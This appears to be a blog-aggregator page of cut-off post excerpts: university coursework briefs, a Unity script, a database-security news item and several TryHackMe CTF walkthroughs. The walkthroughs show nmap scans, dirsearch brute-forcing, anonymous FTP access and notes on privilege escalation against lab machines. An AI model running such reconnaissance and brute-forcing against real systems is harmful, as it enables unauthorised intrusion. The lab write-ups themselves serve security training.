Check all the covariates you are not familiar with before interpretingyour model. Note that some covariates are discrete, so that they can beinterpreted as factors. You are not taught about regression with a mixedof factors and continuous covariates (called ANCOVA), but using the lmfunction in R you can still get appropriate coefficients and anova functionwith sum of squares calculated etc. But remember your ultimate goal is tofind a simple model for interpretation.February 11, 2019 ST300 2Week 152 AssessmentThis question counts for 15% of the total mark for ST300. The work will besubject to checks for plagiarism.3 SubmissionYour work should be submitted anonymously under your candidatenumber. You can look up your candidate number in LSE for you.A printed copy of the project must be put in the project drop-boxin the waiting area of the 6th floor of Columbia House by 12:00pmon the 20th of March 2019. You must sign the plagiarism formand put it separately in the department office collection pointof such form. In addition, you must upload your project using thespecified Moodle link on the ST300 Moodle page by 12:00pm onthe 20th of March 2019. The Moodle upload link will stop workingafter that time and you will only be able to email me your project.Penalties will apply for late submission of either the printed or theelectronic version of your project (but will not be doubly-penalisedif both are not submitted on time). For the plagiarism form seethe link in Moodle before the links to the project.When the submission deadline has passed, a list of candidate numbersfor the work received will be put up on Moodle. Each studentmust check from that list that their work has been received, countingboth the electronic and the printed versions.Extensions to deadlines for coursework will only be given in fullydocumented serious extenuating circumstances. There will be 5nmarks deducted from the total possible 100 marks for this courseworkif either the hard copy or the electronic version is submittedbetween 24(n ? 1) and 24n hours from the stipulated deadline (includingworking days only).February 11, 2019 ST300 ...

October 9, 2021 · 4 min · jiezi

关于安全:TryhackmeBrute-It各种暴力破解

服务探测┌──(rootkali)-[~/tryhackme]└─# nmap -sV -Pn 10.10.218.99 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 03:18 EDTNmap scan report for 10.10.218.99Host is up (0.34s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 85.58 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.218.99 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-10-08_03-18-54.logTarget: http://10.10.218.99[03:18:55] Starting: [03:18:57] 200 - 11KB - /[03:19:03] 301 - 312B - /admin -> http://10.10.218.99/admin/[03:25:33] 403 - 277B - /server-status /admin源代码有一行正文 ...

October 8, 2021 · 3 min · jiezi

关于安全:MACM-401MATH-数值分析

MACM 401/MATH 701/MATH 801Assignment 3, Spring 2019.Michael MonaganDue Monday February 25th at 4pm. Hand in to Dropoff box 1b outside AQ 4100.Late Penalty: ?20% for up to 48 hours late. Zero after that.For problems involving Maple calculations and Maple programming, you should submit a printoutof a Maple worksheet of your Maple session.MATH 801 students should do both questions 4 and 5.MACM 401 students may do either question 4 or 5. For a 15 mark bonus, you may do both.Question 1: The Fast Fourier Transform (30 marks)(a) Let n = 2m and let be a primitive n’th root of unity. To apply the FFT recursively, we usethe fact that 2is a primitive m’th root of unity. Prove this.Also, for p = 97 = 3 × 25 + 1, find a primitve 8’th root of unity in Zp. Use the method inSection 4.8 which first finds a primitive element 1 < < p ? 1 of Zp.(b) What is the Fourier Transform for the polynomial a(x) = 1 + x + x2 + · · · + xn1, i.e., whatis the vector [a(1), a(), a(2), . . . , a(n1)](c) Let M(n) be the number of multiplications that the FFT does. A naive implementation ofthe algorithm leads to this recurrence:M(n) = 2M(n/2) + n + 1 for n > 1with initial value M(1) = 0. In class we said that if we pre-compute the powers i for 0 ≤ i ≤ n/2 and store them in an array W, we can save half the multiplications in the FFTso thatM(n) = 2M(n/2) + n2 for n > 1.By hand, solve this recurrence and show that M(n) = 12n log2 n.(d) Using Maple’s rsolve command, solve the following recurrences. Please simplify the outputfrom rsolve.(i) T(1) = d, T(n) = 3T(n/2) + cn for n > 1 (Karatsuba),(ii) M(1) = 0, M(n) = 2M(n/2) + n/2 for n > 1 (optimized FFT) and(iii) T(1) = 0, T(n) = T(n 1) + (n 1)2for n > 1 (Gaussian elimination).(e) Program the FFT in Maple as a recursive procedure. Your Maple procedure should take asinput (n, A, p, ) where n is a power of 2, A is an array of size n storing the input coefficientsa0, a1, . . . , an1, a prime p and a primitive n’th root of unity in Zp. If you want to precomputean array W = [1, , 2, . . . , n/21] of the powers of to save multiplications you maydo so.Test your procedure on the following input. Let A = [1, 2, 3, 4, 3, 2, 1, 0], p = 97 and wbe the primitive 8’th root of unity. To check that your output B is correct, verify thatF F T(n, B, p, 1) = nA mod p.1(f) Let a(x) = x3 + 3x + 1 and b(x) = 2x2 + x + 1 be polynomials in Z97[x].Calculate the product of c(x) = a(x)b(x) using the FFT.If you could not get your FFT procedure from part (c) to work, use the following one whichcomputes [a(1), a(), . . . , a(n1)] using ordinary evaluation.FourierTransform := proc(n,A,p,omega)local f,x,i,C,wi;f := add(A[i]*x^i, i=0..n-1);C := Array(0..n-1);wi := 1;for i from 0 to n-1 doC[i] := Eval(f,x=wi) mod p;wi := wi*omega mod p;od;return C;end:Question 2: The Modular GCD Algorithm (15 marks)Consider the following pairs of polynomials in Z[x].a1 = 58 x4 415 x3 111 x + 213b1 = 69 x3 112 x2 + 413 x + 113a2 = x5 111 x4 + 112 x3 + 8 x2 888 x + 896b2 = x5 114 x4 + 448 x3 672 x2 + 669 x 336a3 = 396 x5 36 x4 + 3498 x3 2532 x2 + 2844 x 1870b3 = 156 x5 + 69 x4 + 1371 x3 332 x2 + 593 x 697Compute the GCD(ai, bi) using the modular GCD algorithm. Use primes p = 23, 29, 31, 37, 43, ....Identify which primes are bad primes and which are unlucky primes.To compute gcd(p(a), p(b)) in Maple, use Gcd(a,b) mod p . Use the Maple commands chremfor Chinese remaindering, mods to put the coefficients in the symmetric range, and any other Maplecommands that you need.PLEASE make sure you input the polynomials correctly!Question 3: Resultants (15 marks)(a) Calculate the resultant of A = 3x2 + 3 and B = (x 2)(x + 5) by hand.Also, calculate the resultant using Maple. See resultant(b) Let A, B, C be non-constant polynomials in R[x].Show that res(A, BC) = res(A, B) · res(A, C).2(c) Let A, B be two non-zero polynomials in Z[x]. Let A = GA and B = GB where G = gcd(A, B).Recall that a prime p in the modular gcd algorithm is unlucky iff p|R where R = res(A, B) ∈ Z.Consider the following pair of polynomials from question 2.A = 58 x4 415 x3 111 x + 213B = 69 x3 112 x2 + 413 x + 113Using Maple, compute the resultant R and identify all unlucky primes. For each unluckyprime p compute Gcd(A, B) mod p in Maple to verify that the primes are indeed unlucky.Question 4: The Chinese remainder theorem in F[y] (15 marks).Consider the problem of computing GCDs in Zqy, q a prime. If q is large then we can useevaluation and interpolation for y, i.e., we can evaluate at y = 0, 1, 2, ... and interpolate the coeffi-cients of the GCD in Zq[y]. If q is small, e.g. q = 2, this will not work as there will be insufficientevaluation points in Zq. Moreover, y = 0 and y = 1 may be bad or unlucky.But Zq[y] is a Euclidean domain and there are an infinite number of primes (irreducibles) inZq[y] which can play the role of integer primes in the modular GCD algorithm for computing GCDsin Z[x]. For example, here are the irreducibles in Z2[y] up to degree 4.y, y + 1, y2 + y + 1, y3 + y + 1, y3 + y2 + 1, y4 + y + 1, y4 + y3 + 1, y4 + y3 + y2 + y + 1.To do this we need to solve the Chinese remainder problem in Zq[y].Theorem: Let F be any field (e.g. Zq) and let m1, m2, . . . , mn and u1, u2, . . . , un be polynomialsin F[y] with deg(mi) > 0 for 1 ≤ i ≤ n. If gcd(mi, mj ) = 1 for 1 ≤ i < j ≤ n then thereexists a unique polynomial u in F[y] s.t.(i) u ≡ ui (mod mi) for 1 ≤ i ≤ n and(ii) u = 0 or deg u < Pni=1 deg mi.Prove the theorem by modifying the proof of the Chinese remainder theorem for Z to work forF[y]. Now solve the following Chinese remainder problem: find u ∈ Z2[y] such thatu ≡ y2(mod y3 + y + 1) and u ≡ y2 + y + 1 (mod y3 + y2 + 1).Note, in the statement of the theorem the congruence relation u ≡ ui (mod mi) means mi|(u ui)in F[y]. For the extended Euclidean algorithm in Zq[y], use Maple’s Gcdex(...) mod q commandto compute the required inverse.Question 5: Multivariate Polynomial Division (15 marks)In assignment 2 question 2 we were given two polynomials A, B ∈ Z[x1, x2, . . . , xn] with B 6= 0, andI asked you to give pseudo code for the multivariate division algorithm for dividing A by B. I saidthe pseudo code should begin like thisAlgorithm DIVIDE(A,B)Inputs A, B ∈ Z[x1, x2, . . . , xn] satisfying B 6= 0 and n ≥ 0.Output Q ∈ Z[x1, x2, . . . , xn] s.t. A = BQ or FAIL meaning B does not divide A.3For this assignment implement your multivariate division algorithm in Maple as the Mapleprocedure DIVIDE(A,B) to divide A by B. Test you program on the following inputs ...

October 6, 2021 · 7 min · jiezi

关于安全:COMP-74

COMP 74 Assignment 1Milestone 1 Setup1.Make a copy of the Slim PHP TripAPI_Starter project located in the COMP 74/Assign1 academic share folder. 2.Open the project with NetBeans. 3.Right click the TripAPI_Starter project node and select Composer and then Install (no dev). This will install the Slim and Illuminate package dependencies. (If this step does not work, you probably need to set up Composer on your own computer. Follow the instructions at https://getcomposer.org/ ). 4.Review the code in index.php (API endpoints), and in Person.php and Trip.php (Eloquent models). The project currently defines some sample code for providing API endpoints (“/persons”, “/trips”, etc.) The “/trips” endpoint also includes some initial paging code. The models provide some sample code for retrieving data from the travel database. Step 1The sample code for this endpoint currently parses all of the URI components, and obtains the page number from the ‘page’ parameter. (If no ‘page’ parameter was sent with the request, the page number is assigned null.) The code also defines a ‘link to self’ URI (i.e. rebuilds the original URI from the parsed components.)Based on the sample code, complete the pagination code for the “/trips” endpoint by defining links to the first, last, next, and previous pages. For example if the trip table has 15 pages and page 4 is requested, the following links should be defined: first = http://localhost:8000/trips?p... last = http://localhost:8000/trips?p... prev = http://localhost:8000/trips?p... next = http://localhost:8000/trips?p...Modify the sample code so that it returns these values in the ‘links’ field of the result.Add code to detect ‘out of range’ pages. (Note: The Trip model class includes a method to that returns the page count.) Add code to include the item count in the result. The item count will be the same as the page count (i.e. 5) for all pages except the last one, in which case it will be in the range 1-4.Test your code in the Chrome browser (or with Postman) to make sure that the correct data and metadata (i.e. links and page count) are returned. ...

October 4, 2021 · 3 min · jiezi

关于安全:INF2B-技术难点

COURSEWORK 1 FOR INF2B (ADS THREAD, 2018-19)STRING MATCHINGSubmission Deadlines: The coursework consists of two parts (of a different nature) relating toone problem. As shown below these have separate deadlines, you cannot swap the parts roundor submit either part later than the stated deadline (unless you have permission to do so from theyeare organiser). Part 1 consists of Exercise 1 on page 4, §2.1 and Exercise 2 on page 9, §2.2; these involvefairly straightforward analysis.Submit Part 1 by: 4.00PM, 25 February 2019. Part 2 consists of the tasks in §3; these are all software related.Submit Part 2 by: 4.00PM, 08 March 2019.See §4 at the end of this document for instructions on how to submit.§1. IntroductionIn this practical we will consider two methods of searching for all occurrences of a given patternwithin some text (both given as strings). For example we might have a long piece of English textabout Scotland and we wish to search for all occurrences of “Edinburgh” within it. Our aim is toreturn the offset position of all occurrences, if there are no occurrences then we indicate this bya special convention discussed below.The practical has several aims: ...

October 3, 2021 · 33 min · jiezi

关于安全:Unity3d场景切换

startGame.cs using UnityEngine;using System.Collections;using UnityEngine.UI; public class startGame : MonoBehaviour { // Use this for initializationvoid Start () { Button btn = transform.GetComponent<Button>();//获取场景中的按钮 btn.onClick.AddListener(eventListener);//点击事件触发(回调)} // Update is called once per framevoid Update () { } void eventListener(){ createNewScene.create.loadScene("createMan");//“createMan”是新场景名称}} //运行第一个场景,点击按钮,场景产生切换

October 2, 2021 · 1 min · jiezi

关于安全:TryhackmeBoiler-CTF远程执行漏洞SUID提权find

服务发现┌──(rootkali)-[~/tryhackme/boilerctf]└─# nmap -sV -Pn 10.10.109.157 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-30 02:04 EDTNmap scan report for 10.10.109.157Host is up (0.31s latency).Not shown: 65531 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.380/tcp open http Apache httpd 2.4.18 ((Ubuntu))10000/tcp open http MiniServ 1.930 (Webmin httpd)55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 892.53 seconds服务剖析开启了ftp服务,此版本没有比拟闻名的破绽能够匿名登录有一个暗藏文件.info.txt下载到本地待剖析 ...

September 30, 2021 · 5 min · jiezi

关于安全:TryhackmeChocolate-Factorysduo滥用提权vi

服务发现┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# nmap -sV -Pn 10.10.164.40 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-29 22:47 EDTNmap scan report for 10.10.164.40Host is up (0.31s latency).Not shown: 65506 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))100/tcp open newacct?101/tcp open hostname?102/tcp open iso-tsap?103/tcp open gppitnp?104/tcp open acr-nema?105/tcp open csnet-ns?106/tcp open pop3pw?107/tcp open rtelnet?108/tcp open snagas?109/tcp open pop2?110/tcp open pop3?111/tcp open rpcbind?112/tcp open mcidas?113/tcp open ident?114/tcp open audionews?115/tcp open sftp?116/tcp open ansanotify?117/tcp open uucp-path?118/tcp open sqlserv?119/tcp open nntp?120/tcp open cfdptkt?121/tcp open erpc?122/tcp open smakynet?123/tcp open ntp?124/tcp open ansatrader?125/tcp open locus-map?9 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :目录爆破无发现┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.164.40 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-29_22-41-59.logTarget: http://10.10.164.40[22:41:59] Starting: [22:42:08] 200 - 1KB - / [22:47:23] 403 - 277B - /server-status Task Completedftp服务能够匿名登录,把外面的文件下载本地剖析┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# ftp 10.10.164.40Connected to 10.10.164.40.220 (vsFTPd 3.0.3)Name (10.10.164.40:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg226 Directory send OK.ftp> get gum_room.jpglocal: gum_room.jpg remote: gum_room.jpg200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes).226 Transfer complete.208838 bytes received in 3.45 secs (59.0388 kB/s)ftp> 用steghide拆散jpg里的文件,失去一个b64.txt,其实就是base64的密文 ...

September 30, 2021 · 5 min · jiezi

关于安全:TryhackmeAll-in-OneVinegar加密多种提权方法

服务发现┌──(rootkali)-[~/tryhackme/allinone]└─# nmap -sV -Pn 10.10.167.81 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-28 05:58 EDTNmap scan report for 10.10.167.81Host is up (0.31s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.24 secondsftp服务枚举ftp能够匿名登录无任何文件发现也不可以上传文件到ftp用其余用户名登录ftp会提醒This FTP server is anonymous only. ...

September 29, 2021 · 8 min · jiezi

关于安全:TryhackmeGaming-Server敏感信息泄露lxd组用户提权

服务发现┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.77.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 06:09 EDTNmap scan report for 10.10.77.110Host is up (0.32s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 15.63 seconds目录扫描┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 -u http://10.10.78.156 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-26_22-15-41.logTarget: http://10.10.78.156[22:15:41] Starting: [22:15:43] 200 - 3KB - /[22:15:45] 301 - 314B - /uploads -> http://10.10.78.156/uploads/[22:16:05] 301 - 313B - /secret -> http://10.10.78.156/secret/[22:21:29] 403 - 277B - /server-status 在/uploads/页面找到一个字典文件dict.lst下载下来:wget http://10.10.77.110/uploads/dict.lst ...

September 27, 2021 · 3 min · jiezi

关于安全:全球46OnPrem数据库包含漏洞法国最脆弱中国平均bug数最多

近日,网络安全解决方案提供商Imperva 公布了一组钻研报告。 报告数据显示,寰球46%的On-Prem数据库充斥了破绽有些甚至存在了好几年,且均匀每个数据库都蕴含26个破绽,超过一半(56%)数据破绽的重大类别被列为“高”或“重大”。同时,软弱数据库占比法国是寰球迄今为止最重大的(84%);每个数据库的均匀bug数量方面,中国为74个,法国为72个。 Imperva 钻研实验室在 5 年的工夫里里,通过对寰球27000个外部数据库扫描洞察后,得出了此次“前所未有”的钻研后果。该钻研后果描述了一幅严厉的画面:寰球近一半(46%)外部数据库至多有一个未修补的常见破绽和裸露(CVE),均匀数据库有26个破绽,且超过一半(56%)的严重性被列为“高”或“重大”。 数据显示,在未受爱护的数据库方面,法国状况最为严“软弱”,其被扫描数据库中有 84% 至多含有一个破绽 ,均匀每个数据库的破绽数为 72 个。 中国该方面数据则为 52%(均匀 74 个破绽),位于第五。 该钻研后果还表明,寰球近 50% 的组织始终都没能及时修补、更新其数据库软件。Imperva 钻研发现,一些CVE曾经间断三年甚至五年都没有啥变动了。 Imperva 预计,到2021年底,还会有400亿条记录将被毁坏,包含数十亿个数据,其中大部分是敏感的或可辨认的,将来或被网络犯罪分子歹意利用。 据悉,毁坏不可公开拜访的数据库的规范路径是通过网络应用程序破绽,如SQLi或网络钓鱼和恶意软件,旨在让攻击者立足于网络。Imperva正告称,在部署攻打代码之前,攻击者能够通过Shodan等工具扫描裸露的指标,从而使毁坏公共数据库的行为更加容易拜访。 因而黑客极易通过互联网广泛应用的扫描工具发现这些破绽。比方在ExploitDB 之类的存储库上,只需进行简略搜寻,就能够提供必要的概念证实(POC)代码,用来执行减弱性攻打,如权限晋升、绕过身份验证和近程代码执行,最终容许入侵者过滤数据、索取赎金甚至在整个网络中来去自由。因而,破绽很容易被利用,结果很重大。 通过观察这些数据,咱们不禁发会问:目前寰球企业组织解决数据安全的形式是不是存在根本性问题?思考到每年增长 224% 的受损记录的数量,这个问题的答案应该是必定的。 云平台受欢迎 存储敏感数据令人担忧 Imperva 将目前这个现状称作“猖狂的寰球技术流行病”,其“症状”之一,就是寰球外部数据库中存在的破绽,而这些破绽通常存储组织最敏感的数据。 目前,寰球云基础设施和数据库环境的应用越来越多(据估计50% 的数据存储在本地),但这并非是一个能够自行解决的问题。Imperva首席翻新官Elad Erez示意,只管基于云的平台越来越受欢迎,但这一音讯令人担忧。“很多时候,组织漠视数据库安全,因为它们依赖于本机平安产品或过期的流程。鉴于近50% 的on-prem数据库易受攻击,将来报告的数据泄露数量很可能会持续减少,这些泄露的重要性也会减少。”思考到大多数组织持续将其最敏感的数据存储在本地,这可能导致财务损失、名誉侵害和监管处罚。因而,差异化爱护数据的办法至关重要。 面对数据泄露的“爆炸性增长”,企业却并没有投入足够的工夫或资源来真正爱护其数据。所以,建设一个以数据保护为核心的平安策略,成为解决该情况的要害。 建设以数据保护为核心的平安策略 想要解决如此规模的平安问题,对于所有企业来说的确是一个微小的挑战。对此,Imperva 也给出了一些倡议:让企业必须理解,端点及应用程序的补丁和平安工具很重要,但不足以显著升高数据泄露的危险。而保护补丁管理程序,则是解决这一难题的方法,特地是针对以数据为核心的资产,重点是应用数据安全解决方案来爱护数据自身。 Imperva 示意,每个平安团队都能够遵循 5 个次要步骤来加强其on-prem数据库的安全性: 1、发现和分类数据:组织偏向于认为他们晓得他们所有的数据存储库在哪里以及他们持有什么样的数据。主动执行此过程,以便在敏感数据驻留的地位上不存在盲点和假如。 2、评估破绽和修补程序破绽:您须要验证您正在应用最新的平安修补程序运行数据库。 3、审核可见性,爱护以防损坏:理解谁在拜访数据,何时、何地以及他们拜访了哪些数据。启用旨在阻止数据库攻打的策略,或创立用于缩小拜访的自定义策略。 4、进行定期评估:数据库会发生变化,其配置也会发生变化。确保您理解它们是如何变动的,以及您的数据库管理员(DBA)是否谬误地配置了它们,或者只是没有执行最佳实际。 5、辨认数据拜访异样:数据库是大量拜访的资源;用人工办法辨认异样简直是不可能的。部署异样检测工具,以检测数据库的应用程序用户开始体现得像人一样,或者DBA拜访看起来像是数据误用或透露的实例。 当咱们议论安全性的时候,必须从数据自身开始。如果这不平安,易受攻击的web应用程序或数据库,将变成易被攻打的路径。因而,重点必须是取得对所有数据的齐全可视性,无论数据位于何处,晓得谁在拜访数据以及从何处拜访数据。 除此之外,安全性还波及一种对立的办法,在该办法中,数据及其所有门路都以一种内聚的形式失去爱护。独立数据和应用程序安全性不足上下文来中断多向量攻打。每个进攻层必须协同工作,才能够爱护要害数据。 写在最初: 的确,在数据泄露量以每年30% 的惊人速度增长的明天,寰球范畴内数据库的破绽数量如此之高的确让人吃惊。 Imperva 的本次钻研报告,也给是当下寰球企业以“警醒”,数据安全问题须要被器重起来,且“任重道远”。

September 27, 2021 · 1 min · jiezi

关于安全:TryhackmeWgel-CTF敏感信息泄露滥用sudo提权wget

服务发现┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.106.99 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-25 23:41 EDTNmap scan report for 10.10.106.99Host is up (0.38s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u http://10.10.106.99 -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627Error Log: /root/dirsearch/logs/errors-21-09-25_23-42-55.logTarget: http://10.10.106.99[23:42:56] Starting: [23:42:58] 301 - 314B - /sitemap -> http://10.10.106.99/sitemap/[23:42:58] 200 - 11KB - / CTRL+C detected: Pausing threads, please wait... Canceled by the usersitemap是一个叫UNAPP的软件网站介绍页,持续对这个这个网站爆破目录 ...

September 26, 2021 · 3 min · jiezi

关于安全:TryhackmeBrooklyn-Nine-Nineftp匿名登录ssh爆破less提权

服务发现┌──(rootkali)-[~/tryhackme]└─# nmap -sV -Pn 10.10.60.116 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 05:20 EDTNmap scan report for 10.10.60.116Host is up (0.34s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds匿名登录FTP服务┌──(rootkali)-[~/tryhackme/brooklyn]└─# ftp 10.10.60.116 Connected to 10.10.60.116.220 (vsFTPd 3.0.3)Name (10.10.60.116:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt226 Directory send OK.ftp> get note_to_jake.txtlocal: note_to_jake.txt remote: note_to_jake.txt200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).226 Transfer complete.119 bytes received in 0.06 secs (1.9443 kB/s)下载了一个note_to_jake.txt文件 ...

September 24, 2021 · 3 min · jiezi

关于安全:TryhackmeIgnite远程命令执行

服务发现┌──(rootkali)-[~/tryhackme/lgnitevm]└─# nmap -sV -Pn 10.10.248.97 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 02:05 EDTNmap scan report for 10.10.248.97Host is up (0.33s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u http://10.10.248.97 -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627Error Log: /root/dirsearch/logs/errors-21-09-24_02-06-31.logTarget: http://10.10.248.97 [02:06:32] Starting: [02:06:36] 200 - 16KB - /0 [02:06:44] 301 - 313B - /assets -> http://10.10.248.97/assets/[02:06:56] 200 - 16KB - /home [02:08:01] 200 - 16KB - /index [02:10:53] 400 - 1KB - /$file [02:11:51] 200 - 70B - /offline CTRL+C detected: Pausing threads, please wait... 首页剖析首先显示是一个叫Fuel CMS的CMS,版本号是1.4裸露了目录的一些门路信息裸露了原始登录明码: ...

September 24, 2021 · 2 min · jiezi

关于安全:TryhackmeLazyAdmin敏感信息泄露sudo执行敏感文件提权

服务发现┌──(rootkali)-[~/tryhackme/LazyAdminFinal]└─# nmap -sV -Pn 10.10.113.182 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-23 22:02 EDTNmap scan report for 10.10.113.182Host is up (0.37s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u http://10.10.113.182 -e* -t 100 130 ⨯ _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100Error Log: /root/dirsearch/logs/errors-21-09-23_22-07-17.logTarget: http://10.10.113.182[22:07:18] Starting: [22:07:39] 301 - 316B - /content -> http://10.10.113.182/content/ [22:07:42] 200 - 11KB - /index.html 只有一个content目录,关上是一个SweetRicecms介绍页,持续爆破content目录 ...

September 24, 2021 · 3 min · jiezi

关于安全:灵动生日会丨奔走在热爱里有你是欢喜

